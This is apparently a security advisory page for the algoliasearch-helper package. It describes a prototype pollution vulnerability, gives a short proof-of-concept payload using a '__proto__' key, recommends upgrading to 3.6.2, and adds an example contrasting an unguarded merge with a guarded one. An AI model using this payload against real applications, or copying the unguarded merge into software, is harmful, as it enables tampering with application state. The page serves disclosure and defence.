algoliasearch-helper@3.5.4 vulnerabilities

Helper for implementing advanced search features with algolia

  • latest version

    3.22.6

  • latest non vulnerable version

  • first published

    9 years ago

  • latest version published

    6 days ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the algoliasearch-helper package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability: Prototype Pollution
    Severity: M

    algoliasearch-helper is a helper for implementing advanced search features with Algolia.

    Affected versions of this package are vulnerable to Prototype Pollution due to use of the merge function in src/SearchParameters/index.js#SearchParameters._parseNumbers without any protection against prototype properties.

    Note that this vulnerability is only exploitable if the implementation allows users to define arbitrary search patterns.

    PoC

    // Run npm i algoliasearch-helper, then run the below code
    const algohelp = require('algoliasearch-helper')
    var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable to PP"}}');
    var test = {};
    console.log("Before: " + test.polluted); // Before: undefined
    algohelp.SearchParameters._parseNumbers(payload); // {}
    console.log("After: " + test.polluted); // After: vulnerable to PP
    

    How to fix Prototype Pollution?

    Upgrade algoliasearch-helper to version 3.6.2 or higher.

    Vulnerable versions: <3.6.2
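
The missing protection described in this advisory, shown as an added example that is not the package's own code and not its 3.6.2 patch: an unguarded recursive merge next to a guarded one. The function names (`naiveMerge`, `safeMerge`, `demo`) and the sample input are hypothetical and constructed for illustration.

```javascript
// Keys that resolve to a prototype object rather than ordinary data.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Unguarded recursive merge (illustrative; not the package's source).
// target['__proto__'] resolves to Object.prototype, so the recursion
// copies the payload's keys onto the prototype shared by all objects.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (isPlainObject(source[key]) && isPlainObject(target[key])) {
      naiveMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Guarded merge: skips prototype-reaching keys and only recurses into
// objects that are the target's own properties.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const hasOwn = Object.prototype.hasOwnProperty.call(target, key);
      if (!hasOwn || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed input: one ordinary parameter plus a "__proto__" key.
function demo() {
  const input = JSON.parse('{"hitsPerPage": "20", "__proto__": {"polluted": "yes"}}');
  const merged = safeMerge({}, input);
  const afterSafe = {}.polluted;
  naiveMerge({}, input);
  const afterNaive = {}.polluted;
  delete Object.prototype.polluted; // undo the pollution from naiveMerge
  return { merged, afterSafe, afterNaive };
}
```

A guard of this kind only covers merges you write yourself; for the package, the fix remains the upgrade stated above.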